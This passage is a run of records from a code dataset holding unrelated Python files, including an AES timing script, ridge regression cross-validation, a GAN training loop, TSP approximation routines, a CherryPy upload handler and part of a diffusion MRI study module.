open('AES_encrypted_text.txt', 'r+')\n file.write(str(self.encrypted_text))\n\n def decrypt(self):\n if self.mode == AES.MODE_CFB:\n another_cipher = AES.new(self.key, self.mode, self.iv)\n return another_cipher.decrypt(self.encrypted_text)\n return self.cipher.decrypt(self.encrypted_text)\n\n\ndef rootAES():\n data = dict()\n for i in range(2,5):\n start = clock.time()\n encryption = AES_Encryption(8*i, AES.MODE_ECB)\n encryption.encrypt()\n end = clock.time()\n key = str(8*i*8) +'_bits'\n data[key] = end - start\n return data\n\n\n\n\ndata = rootAES()\nprint(data)\nplotGraph(data,'AES Encryption Time')\n","sub_path":"AES_encryption_time.py","file_name":"AES_encryption_time.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"165348563","text":"import numpy as np\nimport matplotlib.pyplot as pl\n\ndef ridge( X, y, d2 ):\n\n A = np.dot(X.T, X)\n B = A + ( d2 * np.identity(8) )\n C = np.linalg.inv( B )\n D = np.dot( C, X.T )\n \n theta = np.dot(D, y)\n\n return theta\n\n#initialize and load data needed\nX = np.loadtxt('prostate.data')\nfig = pl.figure()\nd2 = np.logspace(-5, 10, num=100)\n\nmean_sd = []\nU,S,VT = np.linalg.svd(X, full_matrices=False)\n\n#loop through all deltas\n#for every delta\n#split data to 10 pieces, 1 test, 9 train\n#normalize data\n#get theta\n#use theta on test data (split beforehand into X_test and y_test)\n#multiply theta with X_test, answer is y_hat\n#error is between y_hat and y_test (a lil more complicated)\n#thats one error for one fold, do ten times, with other folds\n#using different batch of test and train data\n#now have 10 errors for one delta\n#compute mean for the ten errors for y axis in plot\n#get the standard deviation for the ten errors for the bar size\n#get df for x axis in plot\n#repeat for all other deltas\nfor i in xrange( d2.size ):\n #10 folds\n ten_errors = [0]*10\n for j in xrange( 10 ):\n #combine two parts of the data\n #eg. if test is rows 10-20\n #combine rows 0-10 and rows 21-97\n data_train = np.vstack((X[0:j*10,:],X[min(j*10+10,97):,:]))\n data_test = np.copy( X[j*10:min(j*10+10,97),:] )\n\n #split into test and train data\n y_train = data_train[:,-1]\n X_train = data_train[:,0:-1]\n\n y_test = data_test[:,-1]\n X_test = data_test[:,0:-1]\n\n #standardize data for current fold\n y_mean = np.mean(y_train)\n X_mean = np.mean(X_train, axis=0)\n X_sd = np.std(X_train, axis=0)\n \n y_train -= y_mean\n X_train -= X_mean\n X_train /= X_sd\n \n y_test -= y_mean\n X_test -= X_mean\n X_test /= X_sd\n \n #get theta\n theta = ridge( X_train, y_train, d2[i])\n\n #prediction\n y_hat = np.dot( X_test, theta )\n\n #take note of errors\n ten_errors[j] = np.sum( ( y_hat - y_test )**2 )\n\n #end of fold loop \n\n #calculate degree of freedom\n df = 0 \n for u in xrange(8):\n df += S[u] / ( S[u] + d2[i])\n\n #take note of mean of ten errors, SD of ten errors and the current\n #degree of freedom\n mean_sd.append( [np.mean(ten_errors, axis=0), np.std(ten_errors, axis=0), df])\n\n #end of delta loop\n\n#from a list convert to array\nmean_sd = np.array( mean_sd )\n\n#plot error bar\npl.errorbar(mean_sd.T[2], mean_sd.T[0], mean_sd.T[1])\npl.show()\n","sub_path":"Python/Other/Projects/assign5-2ii.py","file_name":"assign5-2ii.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"439224931","text":"'''\n Date: 12 Jun 2018\n Author: Guilherme Varela\n\n\n Invokes deep_srlbr scrips from command line arguments\n\n Usage:\n > python srl.py -help \n Shows docs\n\n > python srl.py 16 16 16 16\n Estimates the DBLSTM model with the following defaults:\n * embeddings: glove of size 50.\n * predicate context: previous and posterior word from the verb features.\n * learning rate: 5 * 1e-3\n * batch size: 250\n * target: T column\n\n'''\n\nimport argparse\n\nfrom models import estimate, estimate_kfold\nfrom models import PropbankEncoder\n\nFEATURE_LABELS = ['ID', 'FORM', 'MARKER', 'GPOS',\n 'FORM_CTX_P-1', 'FORM_CTX_P+0', 'FORM_CTX_P+1']\n\n\nif __name__ == '__main__':\n #Parse descriptors\n parser = argparse.ArgumentParser(\n description='''This script uses tensorflow for multiclass classification of Semantic Roles using \n Propbank Br built according to the Propbank guidelines. Uses Conll 2005 Shared Task pearl evaluator\n under the hood.''')\n\n parser.add_argument('depth', type=int, nargs='+', default=[16] * 4,\n help='''Set of integers corresponding\n the deep layer sizes. default: 16 16 16 16\\n''')\n\n parser.add_argument('-embeddings', dest='embeddings', nargs=1,\n default='glo50', choices=['glo50', 'wan50', 'wrd50'],\n help='''Embedding abbrev.\n and size examples: glo50, wan50. Default: glo50 \\n''')\n\n parser.add_argument('-ctx_p', dest='ctx_p', type=int, nargs=1,\n default=1, choices=[1, 2, 3],\n help='''Size of sliding window around predicate.\n Default: 1\\n''')\n\n parser.add_argument('-lr', dest='lr', type=float, nargs=1,\n default=5 * 1e-3,\n help='''Learning rate of the model.\n Default: 0.005\\n''')\n\n parser.add_argument('-batch_size', dest='batch_size', type=int, nargs=1,\n default=250,\n help='''Batch size.\n Default: 250 \\n''')\n\n parser.add_argument('-epochs', dest='epochs', type=int, nargs=1,\n default=1000,\n help='''Number of times to repeat training set during training.\n Default: 1000\\n''')\n\n parser.add_argument('-target', dest='target', nargs=1,\n default='T', choices=['T', 'IOB', 'HEAD'],\n help='''Target representations.\n Default: `T`\\n''')\n\n parser.add_argument('-kfold', action='store_true',\n help='''if present performs kfold\n optimization with 25 folds.\n Default: False''')\n\n parser.add_argument('-version', type=str, dest='version',\n nargs=1, choices=('1.0', '1.1',), default='1.0',\n help='PropBankBr: version 1.0 or 1.1')\n\n args = parser.parse_args()\n\n input_labels = FEATURE_LABELS\n # print(args)\n if isinstance(args.ctx_p, list) and args.ctx_p[0] > 1:\n input_labels.append('FORM_CTX_P-2')\n input_labels.append('FORM_CTX_P+2')\n if args.ctx_p[0] == 3:\n input_labels.append('FORM_CTX_P-3')\n input_labels.append('FORM_CTX_P+3')\n\n target_label = args.target\n embeddings = args.embeddings[0] if isinstance(args.embeddings, list) else args.embeddings\n learning_rate = args.lr[0] if isinstance(args.lr, list) else args.lr\n version = args.version[0] if isinstance(args.version, list) else args.version\n\n if args.kfold:\n # print(input_labels)\n # print(args.target)\n # print(args.depth)\n # print(embeddings)\n # print(args.epochs)\n # print(learning_rate)\n # print(args.batch_size)\n\n estimate_kfold(input_labels=input_labels, target_label=args.target,\n hidden_layers=args.depth, embeddings=embeddings,\n epochs=args.epochs, lr=learning_rate, fold=25,\n version=version)\n else:\n # print(input_labels)\n # print(args.target)\n # print(args.depth)\n # print(embeddings)\n # print(args.epochs)\n # print(learning_rate)\n # print(args.batch_size)\n # print(args.ctx_p)\n\n estimate(input_labels=input_labels, target_label=args.target,\n hidden_layers=args.depth, embeddings=embeddings,\n epochs=args.epochs, lr=learning_rate,\n batch_size=args.batch_size, version=version)\n","sub_path":"srl.py","file_name":"srl.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"182677563","text":"import logging\n\nfrom .additional_info_base_class import AdditionalInfoBaseClass\nfrom core.types.steroids_file.steroids_pandas_file.steroids_pandas_csv_file import SteroidsPandasCsvFile\n\nlogger = logging.getLogger(__name__)\n\n\nclass AdditionalInfoDefault(AdditionalInfoBaseClass):\n\n def __init__(self, cartera_activa, sql_service, source_file):\n \"\"\"\n Args:\n source_file (str): Ubicación del archivo csv\n cartera_activa (ActiveWalletReport): Cartera Activa\n sql_service (SqlService): Servicio de sql en core.services.sql_service\n \"\"\"\n self.source_file = source_file\n self.cartera_activa = cartera_activa\n self.sql_service = sql_service\n\n def to_sql(self):\n try:\n self.sql_service.data_frame_to_sql(\n data_frame=SteroidsPandasCsvFile(source_file=self.source_file,\n delimiter=\";\", quotechar='\"',\n index_col=None, decimal=\",\").read(),\n table_name=self.get_table_name(),\n if_exists='replace'\n )\n except Exception as e:\n logger.exception(e)\n\n def to_cartera_activa(self):\n self.sql_service.database_engine.execute(self.service_query)\n\n def get_table_name(self):\n return f\"{self.__class__.__name__.lower()}\"\n\n def get_cartera_activa_name(self):\n return f\"cartera_activa_{self.cartera_activa.id}\"\n","sub_path":"core/services/additional_info/additional_info_default.py","file_name":"additional_info_default.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"421292965","text":"import os\nimport logging\nfrom math import log10\n\nimport torch\nimport torch.nn as nn\nfrom pytorch_msssim import SSIM, MS_SSIM\nimport torchvision\nfrom torch import optim\nfrom torch.utils.data import DataLoader, random_split\n\nfrom data_load_torch import DatasetLoader\nfrom network import Generator, Discriminator\nfrom loss_torch import GANLoss\n\ninput_dir = \"../data/gabor_hologram/\"\nlabel_dir = \"../data/phase/\"\nsave_path = \"result/\"\nimage_size = 1024\nval_percent = 0.1\nbatch_size = 10\nepochs = 1000\nlr = 0.001\nsave_cp = True\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nbeta1 = 0.5\nbeta2 = 0.999\nlambda_As = 100.0\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3, 4\"\n\n\ndef denorm(x):\n out = (x + 1) / 2\n return out.clamp(0, 1)\n\n\ndef train():\n print(\"data loading\")\n dataset = DatasetLoader(input_dir, label_dir, image_size)\n n_val = int(len(dataset) * val_percent)\n n_train = len(dataset) - n_val\n train, val = random_split(dataset, [n_train, n_val])\n\n train_loader = DataLoader(\n train, batch_size=batch_size, shuffle=True, num_workers=8, pin_memory=True\n )\n val_loader = DataLoader(\n val,\n batch_size=batch_size,\n shuffle=False,\n num_workers=8,\n pin_memory=True,\n drop_last=True,\n )\n\n logging.info(\n f\"\"\"Starting training:\n Epochs: {epochs}\n Batch size: {batch_size}\n Learning rate: {lr}\n Training size: {n_train}\n Validation size: {n_val}\n Checkpoints: {save_cp}\n Device: {device.type}\n Images scaling: {image_size}\n \"\"\"\n )\n\n # Networks\n generator = Generator()\n discriminator = Discriminator()\n\n checkpoint = torch.load(\"./checkpoint/model_epoch_250.pth\")\n\n generator = nn.DataParallel(generator).to(device=device)\n discriminator = nn.DataParallel(discriminator).to(device=device)\n\n generator.load_state_dict(checkpoint[\"g_state_dict\"])\n discriminator.load_state_dict(checkpoint[\"d_state_dict\"])\n\n # Losses\n criterionGAN = GANLoss().to(device)\n\n criterionL1 = nn.L1Loss().to(device)\n\n criterionMSE = nn.MSELoss().to(device)\n\n ssim_module = SSIM(data_range=1.0, size_average=True, channel=1).to(device)\n # ms_ssim_module = MS_SSIM(data_range=1, size_average=True, channel=1).to(device)\n\n # Optimizers\n g_optimizer = optim.Adam(generator.parameters(), lr, [beta1, beta2])\n d_optimizer = optim.Adam(discriminator.parameters(), lr, [beta1, beta2])\n\n g_optimizer.load_state_dict(checkpoint[\"g_optimizer_dict\"])\n d_optimizer.load_state_dict(checkpoint[\"d_optimizer_dict\"])\n\n for epoch in range(epochs):\n train_epoch = epoch + 250\n print(\"epoch: \", train_epoch)\n\n for sample in train_loader:\n input_image = sample[\"input_image\"].to(device=device)\n label_image = sample[\"label_image\"].to(device=device)\n\n # discriminator\n d_optimizer.zero_grad()\n\n fake_image = generator(input_image)\n\n pred_fake = discriminator(input_image, fake_image)\n loss_D_fake = criterionGAN(pred_fake, False)\n\n pred_real = discriminator(input_image, label_image)\n loss_D_real = criterionGAN(pred_real, True)\n\n loss_D = (loss_D_fake + loss_D_real) * 0.5\n\n loss_D.backward()\n d_optimizer.step()\n\n # generator\n g_optimizer.zero_grad()\n\n fake_image = generator(input_image)\n\n pred_real = discriminator(input_image, fake_image)\n loss_G_gan = criterionGAN(pred_real, True)\n\n ssim_loss = 1 - ssim_module(fake_image, label_image)\n\n loss_G_l1 = criterionL1(fake_image, label_image) * lambda_As\n\n # generator loss\n loss_G = loss_G_gan + loss_G_l1 + ssim_loss * lambda_As\n\n loss_G.backward()\n g_optimizer.step()\n\n avg_psnr = 0\n\n num = 0\n\n if train_epoch % 50 == 0:\n for sample in val_loader:\n input_image = sample[\"input_image\"].to(device=device)\n label_image = sample[\"label_image\"].to(device=device)\n\n fake_image = generator(input_image)\n mse = criterionMSE(fake_image, label_image)\n psnr = 10 * log10(1 / mse.item())\n avg_psnr += psnr\n\n print(\"===> Avg. PSNR: {:.4f} dB\".format(avg_psnr / len(val_loader)))\n\n if num < 2:\n torchvision.utils.save_image(\n denorm(fake_image),\n os.path.join(\n save_path,\n \"Fake image-%d-%d.tif\" % (train_epoch + 1, num + 1),\n ),\n )\n if epoch == 0:\n torchvision.utils.save_image(\n denorm(input_image),\n os.path.join(\n save_path,\n \"Input image-%d-%d.tif\" % (train_epoch + 1, num + 1),\n ),\n )\n torchvision.utils.save_image(\n denorm(label_image),\n os.path.join(\n save_path,\n \"Label image-%d-%d.tif\" % (train_epoch + 1, num + 1),\n ),\n )\n num += 1\n\n if not os.path.exists(\"checkpoint\"):\n os.mkdir(\"checkpoint\")\n model_out_path = \"checkpoint/model_epoch_{}.pth\".format(train_epoch)\n\n torch.save(\n {\n \"g_state_dict\": generator.state_dict(),\n \"d_state_dict\": discriminator.state_dict(),\n \"g_optimizer_dict\": g_optimizer.state_dict(),\n \"d_optimizer_dict\": d_optimizer.state_dict(),\n },\n model_out_path,\n )\n\n print(\"Checkpoint saved to {}\".format(\"checkpoint\"))\n\n\nif __name__ == \"__main__\":\n train()\n","sub_path":"pix2pix/train_torch.py","file_name":"train_torch.py","file_ext":"py","file_size_in_byte":6146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263465902","text":"import networkx as nx\n\n\ndef is_fully_connected(G):\n \"\"\"\n returns true if the graph G is (a) undirected (b) is fully connected.\n \"\"\"\n N = G.number_of_nodes()\n E = G.number_of_edges()\n if isinstance(G,nx.Graph) and 2*E == N*(N-1):\n return True\n else:\n return False\n\ndef drop_repeated(input_list):\n \"\"\"\n return a list omitting the repeated elements of input_list while maintaining the order of\n elements in the list.\n \"\"\"\n output_list = []\n for entry in input_list:\n if entry in output_list:\n pass\n else:\n output_list.append(entry)\n return output_list\n\ndef tsp_solution_to_path(G,tsp_route,all_pairs_shortest_paths):\n \"\"\"\n converts the given tsp sequence to be followed by the car into a\n path in the graph G\n Input:\n G - undirected weighted input graph\n tsp_route - list of vertices specifying the route to be followed by the car\n all_pairs_shortest_paths - dict such that all_pairs_shortest_paths[u][v] is the shortest\n path from u to v\n \"\"\"\n prev = tsp_route[0]\n final_path = []\n final_path.append(prev)\n for vertex in tsp_route[1:]:\n # path = nx.shortest_path(G,prev,vertex,weight='weight')\n path = all_pairs_shortest_paths[prev][vertex]\n final_path += path[1:]\n prev = vertex\n return final_path\n\n#################################################################################\n# TSP approximation algorithm via minimum spanning trees\ndef metric_mst_tsp(G,s):\n \"\"\"\n Approximate TSP algorithm. Approximation factor = 2.0\n Returns a list of vertices of G representing an approximate Traveling Salesman Problem cycle\n starting and ending at the source s. Uses an MST approximation.\n Inputs:\n G -- a fully connected undirected weighted graph where edge weights satisfy triangle inequality.\n s -- a vertex in G\n \"\"\"\n T = nx.minimum_spanning_tree(G,weight='weight')\n dfs_edges = list(nx.dfs_edges(T,source=s))\n vertices = []\n for e in dfs_edges:\n vertices.append(e[0])\n vertices.append(e[1])\n tsp_path = drop_repeated(vertices)\n tsp_path.append(s)\n\n return tsp_path\n#################################################################################\n\n\n#################################################################################\n# Routines for Christofides TSP approximation algorithm\ndef find_max_weight(G):\n \"\"\"\n return the weight of the heaviest edge in G\n \"\"\"\n max_weight = 0\n for edge in G.edges:\n u,v = edge[0],edge[1]\n if G[u][v]['weight'] > max_weight:\n max_weight = G[u][v]['weight']\n return max_weight\n\ndef transform_graph_for_max_matching(G):\n \"\"\"\n returns a graph with modified edge weights such that a maximal matching on the\n modified graph corresponds to a minimal matching on G\n \"\"\"\n max_weight = find_max_weight(G)\n modified_graph = nx.Graph()\n for edge in G.edges:\n u,v = edge[0],edge[1]\n wt = G[u][v]['weight']\n modified_graph.add_edge(u,v,weight=max_weight-wt)\n return modified_graph\n\ndef min_weight_matching(G):\n \"\"\"\n Returns a set of edges representing a minimum weight matching.\n Every node appears only once in a matching.\n \"\"\"\n modified_graph = transform_graph_for_max_matching(G)\n min_matching = nx.max_weight_matching(modified_graph, maxcardinality = True)\n return min_matching\n\ndef find_odd_degree_nodes(G):\n \"\"\"\n returns a list of vertices which have odd degree in graph G.\n \"\"\"\n degree = G.degree()\n odd_nodes = []\n for v in G.nodes:\n if degree[v] % 2 == 0:\n pass\n else:\n odd_nodes.append(v)\n return odd_nodes\n\ndef construct_fully_connected_subgraph(node_subset,G):\n \"\"\"\n return a graph with `node_subset` as the nodes.\n The graph is fully connected and uses the same edge weight as in G.\n Inputs:\n G - a fully connected graph with edge weights\n node_subset - List with a subset of nodes to be used in the new graph\n \"\"\"\n sub_graph = nx.Graph()\n for u in node_subset:\n for v in node_subset:\n if u == v:\n pass\n else:\n wt = G[u][v]['weight']\n sub_graph.add_edge(u,v,weight=wt)\n return sub_graph\n\ndef complete_shortest_path_subgraph(G, subset):\n \"\"\"\n return a fully connected graph using the vertices in `subset`\n and whose edges are weighted by the shortest path between these\n vertices in the graph `G`\n \"\"\"\n new_graph = nx.Graph()\n distances = dict(nx.all_pairs_dijkstra_path_length(G))\n for I in range(len(subset)-1):\n u = subset[I]\n for J in range(I+1,len(subset)):\n v = subset[J]\n dist = distances[u][v]\n new_graph.add_edge(u,v,weight=dist)\n return new_graph\n\ndef complete_shortest_path_subgraph_efficient(graph,subset,distances):\n \"\"\"\n return a fully connected graph using the vertices in `subset`\n and whose edges are weighted by the shortest path between these\n vertices in the graph `G`\n Inputs:\n graph - input graph\n subset - list of vertices to be used for the subgraph\n distances - dictionary such that distances[v1][v2] is the length of shortest path from\n v1 to v2\n \"\"\"\n new_graph = nx.Graph()\n for I in range(len(subset)):\n u = subset[I]\n for J in range(I,len(subset)):\n v = subset[J]\n dist = distances[u][v]\n new_graph.add_edge(u,v,weight=dist)\n return new_graph\n\ndef add_specified_edges(G1,G2,edges):\n \"\"\"\n copy G2[edges] into G1\n \"\"\"\n for edge in edges:\n u,v = edge[0],edge[1]\n wt = G2[u][v]['weight']\n G1.add_edge(u,v,weight=wt)\n\ndef construct_eulerian_multigraph(G1,G2,edges):\n \"\"\"\n Construct a multigraph M:\n (1) copy G1 into M\n (2) copy specified edges of G2 into M\n \"\"\"\n eulerian_multigraph = nx.MultiGraph()\n add_specified_edges(eulerian_multigraph,G1,G1.edges)\n add_specified_edges(eulerian_multigraph,G2,edges)\n return eulerian_multigraph\n\ndef metric_christofides_tsp(G,s):\n \"\"\"\n return a list of vertices of G representing an approximate Traveling Salesman Problem cycle\n starting and ending at s. Uses the Christofides approximation.\n G -- a fully connected undirected weighted graph where edge weights satisfy triangle inequality.\n s -- a vertex in G\n \"\"\"\n if G.number_of_nodes() == 1:\n return [s]\n else:\n tree = nx.minimum_spanning_tree(G)\n odd_nodes = find_odd_degree_nodes(tree)\n sub_graph = construct_fully_connected_subgraph(odd_nodes,G)\n min_matching_edges = min_weight_matching(sub_graph)\n eulerian_graph = construct_eulerian_multigraph(tree,G,min_matching_edges)\n circuit = nx.eulerian_circuit(eulerian_graph,s)\n vertices = []\n for edge in circuit:\n vertices.append(edge[0])\n vertices.append(edge[1])\n christofides_tsp = drop_repeated(vertices)\n christofides_tsp.append(s)\n return christofides_tsp\n","sub_path":"tsp_routines.py","file_name":"tsp_routines.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581490375","text":"# Simmulating 2 neurons connected by synapse\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport random\nimport math\n\n# Parameters to be used for the integrate and fire equation\ndeltaT = 1 #timestep [ms]\ntotalTime = 1000 #taking time in [ms]\nE_L = -70 #resting voltage [mV]\nV_reset = -80.0 #reset voltage [mV]\nV_Th = -54.0 # Threshold voltage [mV]\nRm = 10 #membrane resistance [Mohm]\ntau = 20; # time constant [ms]\n\nR_mG_s = 0.15 #[mV]\nR_mI_e = 18.0 #[mV]\nP_max = 0.5 \nt_s = 10.0 # [ms]\nT_f = 0; # when did the presynaptic neuron last fire?\n\n\n# Asumming synapses are excitatory\nE_s = 0.0 #[mV]\n\n\nn = int(totalTime / deltaT)\n\n#initial vector to hold value\ntime = np.linspace(0,totalTime, n+1) #will hold vector of times\nVoltagePreSynaptic = np.zeros(len(time)) #initialize the VoltagePreSynaptic vector.\nVoltagePostSynaptic = np.zeros(len(time)) #initialize the VoltagePreSynaptic vector.\n\ni = 0; #index denoting which element of V is being assigned\nVoltagePreSynaptic[i]= random.uniform(V_reset, V_Th) #value of V at t=0\nVoltagePostSynaptic[i]= random.uniform(V_reset, V_Th)\n\n# P_s = P_max * e(-1 * ((V - T_f)/ t_s)\n# V(t) = ((- V + E_L + (Rm*I_e) - ((P_s * Rm * Gs) * (V - E_s)) ) / tau) * deltaT\nfor index in range(totalTime):\n\n P_sa = P_max * math.exp(-1 * ((index - T_f) / t_s)) * (index - T_f)\n dV_a = ((E_L - VoltagePreSynaptic[index] - ((P_sa * R_mG_s) * (VoltagePreSynaptic[index] - E_s)) + (R_mI_e)) / tau) * deltaT\n VoltagePreSynaptic[index + 1] = VoltagePreSynaptic[index] + dV_a\n\n if(VoltagePreSynaptic[index + 1] > V_Th):\n VoltagePreSynaptic[index + 1] = V_reset\n # T_f = index\n\n P_sb = P_max * math.exp(-1 * ((index - T_f) / t_s)) * (index - T_f)\n dV_b = ((E_L - VoltagePostSynaptic[index] - ((P_sb * R_mG_s) * (VoltagePostSynaptic[index] - E_s)) + (R_mI_e)) / tau) * deltaT\n VoltagePostSynaptic[index + 1] = VoltagePostSynaptic[index] + dV_b\n\n if(VoltagePostSynaptic[index + 1] > V_Th):\n VoltagePostSynaptic[index + 1] = V_reset\n # T_f = index\n\np1, = plt.plot(time,VoltagePreSynaptic, 'b')\np2, = plt.plot(time,VoltagePostSynaptic, 'r')\nplt.xlabel(\"Time in ms\")\nplt.ylabel(\"Voltage in mV\")\nplt.title(\"Excitatory Synapse with Equilibrium Potential 0.0\")\nplt.legend([p2, p1], [\"Neuron A\", \"Neuron B\"])\nplt.show()\n\n","sub_path":"Assignment 1/Question7a.py","file_name":"Question7a.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601716714","text":"#uplaod.py\nimport cherrypy\nimport cgi\nimport tempfile\nimport os\n\n\n__author__ = \"Ex Vito\"\n\n\n\n\nclass myFieldStorage(cgi.FieldStorage):\n \"\"\"Our version uses a named temporary file instead of the default\n non-named file; keeping it visibile (named), allows us to create a\n 2nd link after the upload is done, thus avoiding the overhead of\n making a copy to the destination filename.\"\"\"\n \n def make_file(self, binary=None):\n return tempfile.NamedTemporaryFile()\n\n\ndef noBodyProcess():\n \"\"\"Sets cherrypy.request.process_request_body = False, giving\n us direct control of the file upload destination. By default\n cherrypy loads it to memory, we are directing it to disk.\"\"\"\n cherrypy.request.process_request_body = False\n\ncherrypy.tools.noBodyProcess = cherrypy.Tool('before_request_body', noBodyProcess)\n\n\nclass fileUpload:\n \"\"\"fileUpload cherrypy application\"\"\"\n \n @cherrypy.expose\n def index(self):\n \"\"\"Simplest possible HTML file upload form. Note that the encoding\n type must be multipart/form-data.\"\"\"\n \n return \"\"\"\n \n \n
\n File:
\n \n
\n \n \n \"\"\"\n \n @cherrypy.expose\n @cherrypy.tools.noBodyProcess()\n def upload(self, image=None):\n \"\"\"upload action\n \n We use our variation of cgi.FieldStorage to parse the MIME\n encoded HTML form data containing the file.\"\"\"\n \n # the file transfer can take a long time; by default cherrypy\n # limits responses to 300s; we increase it to 1h\n cherrypy.response.timeout = 3600\n \n # convert the header keys to lower case\n lcHDRS = {}\n for key, val in cherrypy.request.headers.iteritems():\n lcHDRS[key.lower()] = val\n \n # at this point we could limit the upload on content-length...\n # incomingBytes = int(lcHDRS['content-length'])\n \n # create our version of cgi.FieldStorage to parse the MIME encoded\n # form data where the file is contained\n formFields = myFieldStorage(fp=cherrypy.request.rfile,\n headers=lcHDRS,\n environ={'REQUEST_METHOD':'POST'},\n keep_blank_values=True)\n \n # we now create a 2nd link to the file, using the submitted\n # filename; if we renamed, there would be a failure because\n # the NamedTemporaryFile, used by our version of cgi.FieldStorage,\n # explicitly deletes the original filename\n image = formFields['image']\n os.link(image.file.name, '/tmp/'+image.filename)\n \n return \"ok, got it filename='%s'\" % image.filename\n\n\n# remove any limit on the request body size; cherrypy's default is 100MB\n# (maybe we should just increase it ?)\ncherrypy.server.max_request_body_size = 0\n\n# increase server socket timeout to 60s; we are more tolerant of bad\n# quality client-server connections (cherrypy's defult is 10s)\ncherrypy.server.socket_timeout = 60\n\ncherrypy.quickstart(fileUpload())","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103722831","text":"from django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.db.models.signals import post_save\nfrom django.dispatch import Signal, receiver\n\nfrom common.pusher import Pusher\n\npost_bulk_update = Signal(providing_args=['updated_ids'])\n\n\ndef get_users_for_notification(model, ids):\n User = get_user_model()\n users_ids = model.objects.filter(\n id__in=ids,\n ).values_list(f'{model.related_subscription_path}{User._meta.model_name}', flat=True)\n users = User.objects.filter(id__in=users_ids)\n return users\n\n\n@receiver(post_save)\ndef on_single_changes(sender, instance, **kwargs):\n from university.models import Subscription, Timetable, Class, Lecturer, ClassTime\n\n models = [Subscription, Timetable, Class, Lecturer, ClassTime]\n if sender in models:\n ids = [instance.id]\n users = get_users_for_notification(sender, ids)\n message_title = 'updating' if instance.state == sender.ACTIVE else 'deleting'\n transaction.on_commit(lambda: Pusher().send_notification(sender, users, ids, message_title))\n\n# @receiver(post_bulk_update)\n# def on_bulk_changes(sender, updated_ids, **kwargs):\n# users = get_users_for_notification(sender, updated_ids)\n# transaction.on_commit(lambda: Pusher().send_notification(sender, users, updated_ids))\n","sub_path":"university/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"634185885","text":"def is_palindrom(n):\n a = str(n)\n b = a[::-1]\n if a == b :\n return True\n return False\n\ndef solver():\n palindrom = []\n for i in range(100,999+1):\n for j in range(100,999+1):\n if is_palindrom(i*j):\n palindrom.append(i*j)\n return palindrom\n\nif __name__ == '__main__':\n hasil = max(solver())\n print(\"Jawaban : {hasil}\".format(hasil=hasil))","sub_path":"archives/4-largest-palindrome-product/largest-palindrome-product.py","file_name":"largest-palindrome-product.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"522644391","text":"from logging import getLogger\nfrom nipype.interfaces.utility import Merge\nfrom nipype.interfaces.fsl import (\n TOPUP, ApplyTOPUP, BET, FUGUE, Merge as FslMerge)\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces.utility import Merge as merge_lists\nfrom nipype.interfaces.fsl.epi import PrepareFieldmap\nfrom nipype.interfaces.mrtrix3 import ResponseSD, Tractography\nfrom nipype.interfaces.mrtrix3.utils import BrainMask, TensorMetrics\nfrom nipype.interfaces.mrtrix3.reconst import FitTensor, EstimateFOD\nfrom banana.interfaces.custom.motion_correction import GenTopupConfigFiles\nfrom banana.interfaces.mrtrix import (\n DWIPreproc, MRCat, ExtractDWIorB0, MRMath, DWIBiasCorrect, DWIDenoise,\n MRCalc, DWIIntensityNorm, AverageResponse, DWI2Mask)\n# from nipype.workflows.dwi.fsl.tbss import create_tbss_all\n# from banana.interfaces.noddi import (\n# CreateROI, BatchNODDIFitting, SaveParamsAsNIfTI)\nfrom nipype.interfaces import fsl, mrtrix3, utility\nfrom arcana.utils.interfaces import MergeTuple, Chain\nfrom arcana.data import FilesetSpec, InputFilesetSpec\nfrom arcana.utils.interfaces import SelectSession\nfrom arcana.study import ParamSpec, SwitchSpec\nfrom arcana.exceptions import ArcanaMissingDataException, ArcanaNameError\nfrom banana.requirement import (\n fsl_req, mrtrix_req, ants_req)\nfrom banana.interfaces.mrtrix import MRConvert, ExtractFSLGradients\nfrom banana.study import StudyMetaClass\nfrom banana.interfaces.custom.motion_correction import (\n PrepareDWI, AffineMatrixGeneration)\nfrom banana.interfaces.custom.dwi import TransformGradients\nfrom banana.interfaces.utility import AppendPath\nfrom banana.study.base import Study\nfrom banana.bids_ import BidsInputs, BidsAssocInputs\nfrom banana.exceptions import BananaUsageError\nfrom banana.citation import (\n mrtrix_cite, fsl_cite, eddy_cite, topup_cite, distort_correct_cite,\n n4_cite, dwidenoise_cites)\nfrom banana.file_format import (\n mrtrix_image_format, nifti_gz_format, nifti_gz_x_format, fsl_bvecs_format,\n fsl_bvals_format, text_format, dicom_format, eddy_par_format,\n mrtrix_track_format, motion_mats_format, text_matrix_format,\n directory_format, csv_format, zip_format, STD_IMAGE_FORMATS)\nfrom .base import MriStudy\nfrom .epi import EpiSeriesStudy, EpiStudy\n\nlogger = getLogger('banana')\n\n\nclass DwiStudy(EpiSeriesStudy, metaclass=StudyMetaClass):\n\n desc = \"Diffusion-weighted MRI contrast\"\n\n add_data_specs = [\n InputFilesetSpec('anat_5tt', mrtrix_image_format,\n desc=(\"A co-registered segmentation image taken from \"\n \"freesurfer output and simplified into 5 tissue\"\n \" 